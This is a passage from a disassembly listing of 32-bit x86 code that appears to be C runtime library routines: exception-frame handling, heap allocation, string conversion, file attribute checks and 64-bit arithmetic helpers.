var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
sub esp, 34h
push ebx
cmp [ebp+arg_0], 123h
jnz short loc_41FFDC
mov eax, offset loc_420053
mov ecx, [ebp+arg_4]
mov [ecx], eax
xor eax, eax
inc eax
jmp loc_42007C
; ---------------------------------------------------------------------------
loc_41FFDC: ; CODE XREF: sub_41FFBA+E�j
and [ebp+var_28], 0
mov [ebp+var_24], offset loc_42007F
mov eax, ds:dword_4437D4
mov [ebp+var_20], eax
mov eax, [ebp+arg_10]
mov [ebp+var_1C], eax
mov eax, [ebp+arg_4]
mov [ebp+var_18], eax
mov eax, [ebp+arg_14]
mov [ebp+var_14], eax
mov eax, [ebp+arg_18]
mov [ebp+var_10], eax
and [ebp+var_C], 0
and [ebp+var_8], 0
and [ebp+var_4], 0
mov [ebp+var_C], esp
mov [ebp+var_8], ebp
mov eax, large fs:0
mov [ebp+var_28], eax
lea eax, [ebp+var_28]
mov large fs:0, eax
mov [ebp+var_34], 1
mov eax, [ebp+arg_0]
mov [ebp+var_30], eax
mov eax, [ebp+arg_8]
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
mov eax, [ebp+arg_0]
push dword ptr [eax]
call ds:dword_4E2990
pop ecx
pop ecx
and [ebp+var_34], 0
loc_420053: ; DATA XREF: sub_41FFBA+10�o
cmp [ebp+var_4], 0
jz short loc_420070
mov ebx, large fs:0
mov eax, [ebx]
mov ebx, [ebp+var_28]
mov [ebx], eax
mov large fs:0, ebx
jmp short loc_420079
; ---------------------------------------------------------------------------
loc_420070: ; CODE XREF: sub_41FFBA+9D�j
mov eax, [ebp+var_28]
mov large fs:0, eax
loc_420079: ; CODE XREF: sub_41FFBA+B4�j
mov eax, [ebp+var_34]
loc_42007C: ; CODE XREF: sub_41FFBA+1D�j
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_42007F: ; DATA XREF: sub_41FFBA+26�o
push ebp
mov ebp, esp
push ecx
push ebx
cld
mov eax, [ebp+arg_4]
mov eax, [eax+8]
cmp eax, ds:dword_4437D4
jz short loc_4200AA
mov eax, [ebp+arg_0]
mov eax, [eax+4]
or eax, 8
mov ecx, [ebp+arg_0]
mov [ecx+4], eax
xor eax, eax
inc eax
jmp loc_42012E
; ---------------------------------------------------------------------------
loc_4200AA: ; CODE XREF: sub_41FFBA+D7�j
mov eax, [ebp+arg_0]
mov eax, [eax+4]
and eax, 66h
jz short loc_4200C4
mov eax, [ebp+arg_4]
mov dword ptr [eax+24h], 1
xor eax, eax
inc eax
jmp short loc_42012E
; ---------------------------------------------------------------------------
loc_4200C4: ; CODE XREF: sub_41FFBA+F9�j
push 1
mov eax, [ebp+arg_4]
push dword ptr [eax+18h]
mov eax, [ebp+arg_4]
push dword ptr [eax+14h]
mov eax, [ebp+arg_4]
push dword ptr [eax+0Ch]
push 0
push [ebp+arg_8]
mov eax, [ebp+arg_4]
push dword ptr [eax+10h]
push [ebp+arg_0]
call sub_425413
add esp, 20h
mov eax, [ebp+arg_4]
cmp dword ptr [eax+24h], 0
jnz short loc_420102
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41FEF7
loc_420102: ; CODE XREF: sub_41FFBA+13B�j
push 0
push 0
push 0
push 0
push 0
lea eax, [ebp+var_4]
push eax
push 123h
call sub_41FFBA
add esp, 1Ch
mov eax, [ebp+var_4]
mov ebx, [ebp+arg_4]
mov esp, [ebx+1Ch]
mov ebp, [ebx+20h]
jmp eax
; ---------------------------------------------------------------------------
db 33h
db 0C0h, 40h
; ---------------------------------------------------------------------------
loc_42012E: ; CODE XREF: sub_41FFBA+EB�j
; sub_41FFBA+108�j
pop ebx
leave
retn
sub_41FFBA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420131 proc near ; CODE XREF: sub_425165+50�p
; sub_425221+F5�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_4], 0
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, [edi+0Ch]
mov ebx, [edi+10h]
mov eax, esi
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
jl short loc_420187
loc_42014F: ; CODE XREF: sub_420131+51�j
cmp esi, 0FFFFFFFFh
jnz short loc_420159
call sub_4254E2
loc_420159: ; CODE XREF: sub_420131+21�j
mov ecx, [ebp+arg_8]
dec esi
lea eax, [esi+esi*4]
lea eax, [ebx+eax*4]
cmp [eax+4], ecx
jge short loc_42016D
cmp ecx, [eax+8]
jle short loc_420172
loc_42016D: ; CODE XREF: sub_420131+35�j
cmp esi, 0FFFFFFFFh
jnz short loc_42017E
loc_420172: ; CODE XREF: sub_420131+3A�j
mov eax, [ebp+arg_0]
dec [ebp+arg_4]
mov [ebp+var_4], eax
mov [ebp+arg_0], esi
loc_42017E: ; CODE XREF: sub_420131+3F�j
cmp [ebp+arg_4], 0
jge short loc_42014F
mov eax, [ebp+var_4]
loc_420187: ; CODE XREF: sub_420131+1C�j
mov ecx, [ebp+arg_C]
inc esi
mov [ecx], esi
mov ecx, [ebp+arg_10]
mov [ecx], eax
cmp eax, [edi+0Ch]
ja short loc_42019B
cmp esi, eax
jbe short loc_4201A0
loc_42019B: ; CODE XREF: sub_420131+64�j
call sub_4254E2
loc_4201A0: ; CODE XREF: sub_420131+68�j
pop edi
lea eax, [esi+esi*4]
pop esi
lea eax, [ebx+eax*4]
pop ebx
leave
retn
sub_420131 endp
; =============== S U B R O U T I N E =======================================
sub_4201AB proc near ; CODE XREF: sub_424DD8+28�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
mov ecx, [esp+arg_4]
mov [eax], ecx
mov ecx, ds:dword_4E2950
mov [eax+4], ecx
mov ds:dword_4E2950, eax
retn
sub_4201AB endp
; =============== S U B R O U T I N E =======================================
sub_4201C4 proc near ; CODE XREF: sub_424F1C+4D�p
arg_0 = dword ptr 4
mov eax, ds:dword_4E2950
jmp short loc_4201D6
; ---------------------------------------------------------------------------
loc_4201CB: ; CODE XREF: sub_4201C4+14�j
mov ecx, [eax]
cmp ecx, [esp+arg_0]
jz short loc_4201DC
mov eax, [eax+4]
loc_4201D6: ; CODE XREF: sub_4201C4+5�j
test eax, eax
jnz short loc_4201CB
inc eax
retn
; ---------------------------------------------------------------------------
loc_4201DC: ; CODE XREF: sub_4201C4+D�j
xor eax, eax
retn
sub_4201C4 endp
; =============== S U B R O U T I N E =======================================
sub_4201DF proc near ; CODE XREF: sub_424F1C+9�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov eax, ds:dword_4E2950
cmp edx, eax
jnz short loc_4201F5
mov eax, [edx+4]
mov ds:dword_4E2950, eax
retn
; ---------------------------------------------------------------------------
loc_4201F5: ; CODE XREF: sub_4201DF+B�j
mov ecx, eax
add eax, 4
jmp short loc_420207
; ---------------------------------------------------------------------------
loc_4201FC: ; CODE XREF: sub_4201DF+2B�j
mov eax, [eax]
cmp edx, eax
jz short loc_420211
mov ecx, eax
lea eax, [ecx+4]
loc_420207: ; CODE XREF: sub_4201DF+1B�j
cmp dword ptr [eax], 0
jnz short loc_4201FC
jmp sub_4254E2
; ---------------------------------------------------------------------------
loc_420211: ; CODE XREF: sub_4201DF+21�j
mov eax, [edx+4]
mov [ecx+4], eax
retn
sub_4201DF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420218 proc near ; CODE XREF: sub_424DD8+66�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, ds:dword_4437D4
and [ebp+var_18], 0
mov ecx, [ebp+arg_0]
mov [ebp+var_10], eax
mov eax, [ebp+arg_4]
mov [ebp+var_C], eax
mov eax, [ebp+arg_C]
inc eax
mov [ebp+var_14], offset byte_41FF7F
mov [ebp+var_8], ecx
mov [ebp+var_4], eax
mov eax, large fs:0
mov [ebp+var_18], eax
lea eax, [ebp+var_18]
mov large fs:0, eax
push [ebp+arg_10]
push ecx
push [ebp+arg_8]
call sub_425510
mov ecx, eax
mov eax, [ebp+var_18]
mov large fs:0, eax
mov eax, ecx
leave
retn
sub_420218 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420274 proc near ; CODE XREF: seg000:00425FD8�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_42028C
push [ebp+arg_0]
call sub_4298DC ; RtlUnwind
loc_42028C: ; DATA XREF: sub_420274+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_420274 endp
; ---------------------------------------------------------------------------
dword_420294 dd 4244C8Bh, 60441F7h, 0B8000000h, 1, 448B0F74h, 548B0824h
; DATA XREF: sub_4202B6+A�o
; sub_42031E+9�o
dd 2891024h, 3B8h
db 0, 0C3h
; =============== S U B R O U T I N E =======================================
sub_4202B6 proc near ; CODE XREF: seg000:00425FE5�p
; seg000:00426038�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset dword_420294
push large dword ptr fs:0
mov large fs:0, esp
loc_4202D3: ; CODE XREF: sub_4202B6:loc_42030E�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_420310
cmp esi, [esp+1Ch+arg_4]
jz short loc_420310
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_42030E
push 101h
mov eax, [ebx+esi*4+8]
call sub_42034A
call dword ptr [ebx+esi*4+8]
loc_42030E: ; CODE XREF: sub_4202B6+44�j
jmp short loc_4202D3
; ---------------------------------------------------------------------------
loc_420310: ; CODE XREF: sub_4202B6+2A�j
; sub_4202B6+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_4202B6 endp
; =============== S U B R O U T I N E =======================================
sub_42031E proc near ; CODE XREF: sub_424F1C+57�p
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset dword_420294
jnz short locret_420340
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_420340
mov eax, 1
locret_420340: ; CODE XREF: sub_42031E+10�j
; sub_42031E+1B�j
retn
sub_42031E endp
; =============== S U B R O U T I N E =======================================
sub_420341 proc near ; CODE XREF: sub_425510+1E�p
; sub_425510+40�p
push ebx
push ecx
mov ebx, offset dword_443794
jmp short loc_420354
sub_420341 endp
; =============== S U B R O U T I N E =======================================
sub_42034A proc near ; CODE XREF: sub_4202B6+4F�p
; seg000:00425FF6�p
push ebx
push ecx
mov ebx, offset dword_443794
mov ecx, [ebp+8]
loc_420354: ; CODE XREF: sub_420341+7�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_42034A endp
; ---------------------------------------------------------------------------
dw 0CCCCh
; =============== S U B R O U T I N E =======================================
sub_420364 proc near ; CODE XREF: sub_40F024+5�p
; sub_40F47A+5�p ...
push 0FFFFFFFFh
push eax
mov eax, large fs:0
push eax
mov eax, [esp+0Ch]
mov large fs:0, esp
mov [esp+0Ch], ebp
lea ebp, [esp+0Ch]
push eax
retn
sub_420364 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_420383 proc near ; CODE XREF: sub_4297E3+3A�p
; sub_42987E+3A�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = byte ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push edi
push 8
pop ecx
mov esi, offset dword_439450
lea edi, [ebp+var_20]
rep movsd
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
mov [ebp+var_4], eax
lea eax, [ebp+var_C]
push eax
push [ebp+var_10]
push [ebp+var_1C]
push [ebp+var_20]
call ds:dword_42B1A0 ; RaiseException
pop edi
pop esi
leave
retn 8
sub_420383 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
; =============== S U B R O U T I N E =======================================
sub_4203C0 proc near ; CODE XREF: sub_40F47A+82�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = qword ptr 4
cmp ds:dword_4E2B90, 0
jz sub_4255CA
sub esp, 8
stmxcsr [esp+8+var_4]
mov eax, [esp+8+var_4]
and eax, 1F80h
cmp eax, 1F80h
jnz short loc_4203F4
fnstcw word ptr [esp+8+var_8]
mov ax, word ptr [esp+8+var_8]
and ax, 7Fh
cmp ax, 7Fh
loc_4203F4: ; CODE XREF: sub_4203C0+23�j
lea esp, [esp+8]
jnz sub_4255CA
jmp short $+2
movq xmm0, [esp+arg_0]
movapd xmm2, oword ptr ds:oword_439480
movapd xmm1, xmm0
movapd xmm7, xmm0
psrlq xmm0, 34h
movd eax, xmm0
andpd xmm0, oword ptr ds:oword_4394A0
psubd xmm2, xmm0
psrlq xmm1, xmm2
test eax, 800h
jz short loc_420482
cmp eax, 0BFFh
jl short loc_4204BA
psllq xmm1, xmm2
cmp eax, 0C32h
jg short loc_420453
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_420453: ; CODE XREF: sub_4203C0+86�j
; sub_4203C0+E1�j
ucomisd xmm7, xmm7
jnp short loc_42047D
mov edx, 3ECh
sub esp, 10h
mov [esp+10h+var_4], edx
mov edx, esp
add edx, 14h
mov [esp+10h+var_8], edx
mov [esp+10h+var_C], edx
mov [esp+10h+var_10], edx
call sub_424391
add esp, 10h
loc_42047D: ; CODE XREF: sub_4203C0+97�j
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_420482: ; CODE XREF: sub_4203C0+74�j
movq xmm0, [esp+arg_0]
psllq xmm1, xmm2
movapd xmm3, xmm0
cmppd xmm0, xmm1, 6
cmp eax, 3FFh
jl short loc_4204C1
cmp eax, 432h
jg short loc_420453
andpd xmm0, oword ptr ds:oword_439470
addsd xmm1, xmm0
movq [esp+arg_0], xmm1
fld [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_4204BA: ; CODE XREF: sub_4203C0+7B�j
fld ds:dbl_4394B0
retn
; ---------------------------------------------------------------------------
loc_4204C1: ; CODE XREF: sub_4203C0+DA�j
cmppd xmm3, oword ptr ds:oword_439490, 6
andpd xmm3, oword ptr ds:oword_439470
movq [esp+arg_0], xmm3
fld [esp+arg_0]
retn
sub_4203C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4204DD proc near ; CODE XREF: sub_40F87A+77�p
; seg000:00411084�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
xor esi, esi
xor eax, eax
cmp ebx, esi
push edi
jz loc_4205AE
mov edx, [ebp+arg_8]
cmp edx, esi
jz loc_4205DF
cmp ds:dword_4E29A4, esi
jnz short loc_42052E
cmp edx, esi
jbe loc_4205DF
loc_42050D: ; CODE XREF: sub_4204DD+4A�j
mov ecx, [ebp+arg_4]
add ecx, eax
movzx si, byte ptr [ecx]
mov [ebx], si
cmp byte ptr [ecx], 0
jz loc_4205DF
inc eax
inc ebx
inc ebx
cmp eax, edx
jb short loc_42050D
jmp loc_4205DF
; ---------------------------------------------------------------------------
loc_42052E: ; CODE XREF: sub_4204DD+26�j
mov edi, [ebp+arg_4]
mov esi, ds:dword_42B07C
push edx
push ebx
push 0FFFFFFFFh
push edi
push 9
push ds:dword_4E29B4
call esi ; MultiByteToWideChar
test eax, eax
jnz loc_4205DE
call ds:dword_42B01C ; RtlGetLastWin32Error
cmp eax, 7Ah
jz short loc_420568
loc_420559: ; CODE XREF: sub_4204DD+B0�j
; sub_4204DD+CF�j ...
mov ds:dword_4E28F4, 2Ah
or eax, 0FFFFFFFFh
jmp short loc_4205DF
; ---------------------------------------------------------------------------
loc_420568: ; CODE XREF: sub_4204DD+7A�j
mov eax, [ebp+arg_8]
mov [ebp+arg_0], eax
mov eax, edi
loc_420570: ; CODE XREF: sub_4204DD+B7�j
mov cl, [eax]
dec [ebp+arg_0]
test cl, cl
jz short loc_420596
mov edx, ds:off_4437D8
movzx ecx, cl
test byte ptr [edx+ecx*2+1], 80h
jz short loc_42058F
inc eax
cmp byte ptr [eax], 0
jz short loc_420559
loc_42058F: ; CODE XREF: sub_4204DD+AA�j
inc eax
cmp [ebp+arg_0], 0
jnz short loc_420570
loc_420596: ; CODE XREF: sub_4204DD+9A�j
push [ebp+arg_8]
sub eax, edi
push ebx
push eax
push edi
push 1
push ds:dword_4E29B4
call esi ; MultiByteToWideChar
test eax, eax
jnz short loc_4205DF
jmp short loc_420559
; ---------------------------------------------------------------------------
loc_4205AE: ; CODE XREF: sub_4204DD+F�j
cmp ds:dword_4E29A4, esi
jnz short loc_4205C1
push [ebp+arg_4]
call sub_41E1C0
pop ecx
jmp short loc_4205DF
; ---------------------------------------------------------------------------
loc_4205C1: ; CODE XREF: sub_4204DD+D7�j
push esi
push esi
push 0FFFFFFFFh
push [ebp+arg_4]
push 9
push ds:dword_4E29B4
call ds:dword_42B07C ; MultiByteToWideChar
cmp eax, esi
jz loc_420559
loc_4205DE: ; CODE XREF: sub_4204DD+6B�j
dec eax
loc_4205DF: ; CODE XREF: sub_4204DD+1A�j
; sub_4204DD+2A�j ...
pop edi
pop esi
pop ebx
pop ebp
retn
sub_4204DD endp
; =============== S U B R O U T I N E =======================================
sub_4205E4 proc near ; CODE XREF: sub_40FA56+1E�p
; sub_40FA56+37�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
imul esi, [esp+8+arg_4]
test esi, esi
push edi
mov ebx, esi
jnz short loc_4205F7
inc esi
loc_4205F7: ; CODE XREF: sub_4205E4+10�j
; sub_4205E4+65�j
xor edi, edi
cmp esi, 0FFFFFFE0h
ja short loc_420637
cmp ds:dword_4E2F00, 3
jnz short loc_420622
add esi, 0Fh
and esi, 0FFFFFFF0h
cmp ebx, ds:dword_4E2EEC
ja short loc_420622
push ebx
call sub_421967
mov edi, eax
test edi, edi
pop ecx
jnz short loc_42064D
loc_420622: ; CODE XREF: sub_4205E4+21�j
; sub_4205E4+2F�j
push esi
push 8
push ds:dword_4E2EFC
call ds:dword_42B0E4 ; RtlAllocateHeap
mov edi, eax
test edi, edi
jnz short loc_420659
loc_420637: ; CODE XREF: sub_4205E4+18�j
cmp ds:dword_4E2964, 0
jz short loc_420659
push esi
call sub_421F2F
test eax, eax
pop ecx
jnz short loc_4205F7
jmp short loc_42065B
; ---------------------------------------------------------------------------
loc_42064D: ; CODE XREF: sub_4205E4+3C�j
push ebx
push 0
push edi
call sub_41E5F0
add esp, 0Ch
loc_420659: ; CODE XREF: sub_4205E4+51�j
; sub_4205E4+5A�j
mov eax, edi
loc_42065B: ; CODE XREF: sub_4205E4+67�j
pop edi
pop esi
pop ebx
retn
sub_4205E4 endp
; =============== S U B R O U T I N E =======================================
sub_42065F proc near ; CODE XREF: sub_40FDC3+100�p
; sub_419429+8�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push [esp+arg_0]
call ds:dword_42B050 ; GetFileAttributesA
cmp eax, 0FFFFFFFFh
jnz short loc_42067F
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
call sub_422C0F
pop ecx
loc_42067B: ; CODE XREF: sub_42065F+3F�j
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_42067F: ; CODE XREF: sub_42065F+D�j
test al, 1
jz short loc_4206A0
test [esp+arg_4], 2
jz short loc_4206A0
mov ds:dword_4E28F4, 0Dh
mov ds:dword_4E28F8, 5
jmp short loc_42067B
; ---------------------------------------------------------------------------
loc_4206A0: ; CODE XREF: sub_42065F+22�j
; sub_42065F+29�j
xor eax, eax
retn
sub_42065F endp
; =============== S U B R O U T I N E =======================================
sub_4206A3 proc near ; CODE XREF: seg000:004111C1�p
; seg000:004111E6�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
loc_4206A7: ; CODE XREF: sub_4206A3+C�j
mov cx, [eax]
inc eax
inc eax
test cx, cx
jnz short loc_4206A7
sub eax, [esp+arg_0]
sar eax, 1
dec eax
retn
sub_4206A3 endp
; ---------------------------------------------------------------------------
db 56h, 8Bh, 74h
dd 468B0824h, 5783A80Ch, 7C8B7174h, 0FF851424h, 0FF830A74h
dd 83057401h, 5F7502FFh, 83EFE083h, 468901FFh, 560D750Ch
dd 5040E8h, 24440100h, 0FF335914h, 8D1E856h, 468B0000h
dd 59C0840Ch, 0E0830879h, 0C4689FCh, 1A814EBh, 8A81074h
dd 0C4F60C74h, 0C7077504h, 2001846h, 0FF570000h, 0FF142474h
dd 76E81076h, 3300004Fh, 0CC483C9h, 0FFFF883h, 8B49C195h
dd 0C70DEBC1h, 4E28F405h, 1600h, 0FFC88300h, 0CCC35E5Fh
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_420750 proc near ; CODE XREF: sub_415825+19A�p
; sub_4164A9+117�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_420769
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_420769: ; CODE XREF: sub_420750+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_420750 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ebp+8]
push ebx
push edi
mov edi, [ebp+0Ch]
imul edi, [ebp+10h]
test edi, edi
mov [ebp+8], eax
mov [ebp-8], edi
mov ebx, edi
jnz short loc_4207A8
xor eax, eax
jmp loc_420873
; ---------------------------------------------------------------------------
loc_4207A8: ; CODE XREF: seg000:0042079F�j
push esi
mov esi, [ebp+14h]
test word ptr [esi+0Ch], 10Ch
jz short loc_4207BC
mov eax, [esi+18h]
mov [ebp-4], eax
jmp short loc_4207C3
; ---------------------------------------------------------------------------
loc_4207BC: ; CODE XREF: seg000:004207B2�j
mov dword ptr [ebp-4], 1000h
loc_4207C3: ; CODE XREF: seg000:004207BA�j
; seg000:00420869�j
mov ecx, [esi+0Ch]
and ecx, 108h
jz short loc_4207F7
mov eax, [esi+4]
test eax, eax
jz short loc_4207F7
cmp ebx, eax
mov edi, ebx
jb short loc_4207DD
mov edi, eax
loc_4207DD: ; CODE XREF: seg000:004207D9�j
push edi
push dword ptr [ebp+8]
push dword ptr [esi]
call sub_41F400
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
sub ebx, edi
add [ebp+8], edi
jmp short loc_420839
; ---------------------------------------------------------------------------
loc_4207F7: ; CODE XREF: seg000:004207CC�j
; seg000:004207D3�j
cmp ebx, [ebp-4]
jb short loc_42083E
test ecx, ecx
jz short loc_42080B
push esi
call sub_420FC7
test eax, eax
pop ecx
jnz short loc_420877
loc_42080B: ; CODE XREF: seg000:004207FE�j
cmp dword ptr [ebp-4], 0
mov edi, ebx
jz short loc_42081C
xor edx, edx
mov eax, ebx
div dword ptr [ebp-4]
sub edi, edx
loc_42081C: ; CODE XREF: seg000:00420811�j
push edi
push dword ptr [ebp+8]
push dword ptr [esi+10h]
call sub_425882
add esp, 0Ch
cmp eax, 0FFFFFFFFh
jz short loc_420882
add [ebp+8], eax
sub ebx, eax
cmp eax, edi
jb short loc_420882
loc_420839: ; CODE XREF: seg000:004207F5�j
mov edi, [ebp-8]
jmp short loc_420867
; ---------------------------------------------------------------------------
loc_42083E: ; CODE XREF: seg000:004207FA�j
mov eax, [ebp+8]
movsx eax, byte ptr [eax]
push esi
push eax
call sub_422124
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz short loc_420877
inc dword ptr [ebp+8]
mov eax, [esi+18h]
dec ebx
test eax, eax
mov [ebp-4], eax
jg short loc_420867
mov dword ptr [ebp-4], 1
loc_420867: ; CODE XREF: seg000:0042083C�j
; seg000:0042085E�j
test ebx, ebx
jnz loc_4207C3
mov eax, [ebp+10h]
loc_420872: ; CODE XREF: seg000:00420880�j
pop esi
loc_420873: ; CODE XREF: seg000:004207A3�j
pop edi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_420877: ; CODE XREF: seg000:00420809�j
; seg000:00420850�j
mov eax, edi
loc_420879: ; CODE XREF: seg000:00420889�j
sub eax, ebx
xor edx, edx
div dword ptr [ebp+0Ch]
jmp short loc_420872
; ---------------------------------------------------------------------------
loc_420882: ; CODE XREF: seg000:0042082E�j
; seg000:00420837�j
or dword ptr [esi+0Ch], 20h
mov eax, [ebp-8]
jmp short loc_420879
; ---------------------------------------------------------------------------
db 0CCh
dd 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
sub_420890 proc near ; CODE XREF: sub_419443+2C�p
; sub_4222C8+654�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push esi
mov eax, [esp+4+arg_C]
or eax, eax
jnz short loc_4208C1
mov ecx, [esp+4+arg_8]
mov eax, [esp+4+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
div ecx
mov esi, eax
mov eax, ebx
mul [esp+4+arg_8]
mov ecx, eax
mov eax, esi
mul [esp+4+arg_8]
add edx, ecx
jmp short loc_420908
; ---------------------------------------------------------------------------
loc_4208C1: ; CODE XREF: sub_420890+7�j
mov ecx, eax
mov ebx, [esp+4+arg_8]
mov edx, [esp+4+arg_4]
mov eax, [esp+4+arg_0]
loc_4208CF: ; CODE XREF: sub_420890+49�j
shr ecx, 1
rcr ebx, 1
shr edx, 1
rcr eax, 1
or ecx, ecx
jnz short loc_4208CF
div ebx
mov esi, eax
mul [esp+4+arg_C]
mov ecx, eax
mov eax, [esp+4+arg_8]
mul esi
add edx, ecx
jb short loc_4208FD
cmp edx, [esp+4+arg_4]
ja short loc_4208FD
jb short loc_420906
cmp eax, [esp+4+arg_0]
jbe short loc_420906
loc_4208FD: ; CODE XREF: sub_420890+5D�j
; sub_420890+63�j
dec esi
sub eax, [esp+4+arg_8]
sbb edx, [esp+4+arg_C]
loc_420906: ; CODE XREF: sub_420890+65�j
; sub_420890+6B�j
xor ebx, ebx
loc_420908: ; CODE XREF: sub_420890+2F�j
sub eax, [esp+4+arg_0]
sbb edx, [esp+4+arg_4]
neg edx
neg eax
sbb edx, 0
mov ecx, edx
mov edx, ebx
mov ebx, ecx
mov ecx, eax
mov eax, esi
pop esi
retn 10h
sub_420890 endp
; ---------------------------------------------------------------------------
db 3 dup(0CCh)
dd 2 dup(0CCCCCCCCh)
; =============== S U B R O U T I N E =======================================
sub_420930 proc near ; CODE XREF: sub_419549+5F�p
; sub_419549+90�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
push edi
push esi
push ebx
xor edi, edi
mov eax, [esp+0Ch+arg_4]
or eax, eax
jge short loc_420951
inc edi
mov edx, [esp+0Ch+arg_0]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_4], eax
mov [esp+0Ch+arg_0], edx
loc_420951: ; CODE XREF: sub_420930+B�j
mov eax, [esp+0Ch+arg_C]
or eax, eax
jge short loc_42096D
inc edi
mov edx, [esp+0Ch+arg_8]
neg eax
neg edx
sbb eax, 0
mov [esp+0Ch+arg_C], eax
mov [esp+0Ch+arg_8], edx
loc_42096D: ; CODE XREF: sub_420930+27�j
or eax, eax
jnz short loc_420989
mov ecx, [esp+0Ch+arg_8]
mov eax, [esp+0Ch+arg_4]
xor edx, edx
div ecx
mov ebx, eax
mov eax, [esp+0Ch+arg_0]
div ecx
mov edx, ebx
jmp short loc_4209CA
; ---------------------------------------------------------------------------
loc_420989: ; CODE XREF: sub_420930+3F�j
mov ebx, eax
mov ecx, [esp+0Ch+arg_8]
mov edx, [esp+0Ch+arg_4]
mov eax, [esp+0Ch+arg_0]
loc_420997: ; CODE XREF: sub_420930+71�j
shr ebx, 1
rcr ecx, 1
shr edx, 1
rcr eax, 1
or ebx, ebx
jnz short loc_420997
div ecx
mov esi, eax
mul [esp+0Ch+arg_C]
mov ecx, eax
mov eax, [esp+0Ch+arg_8]
mul esi
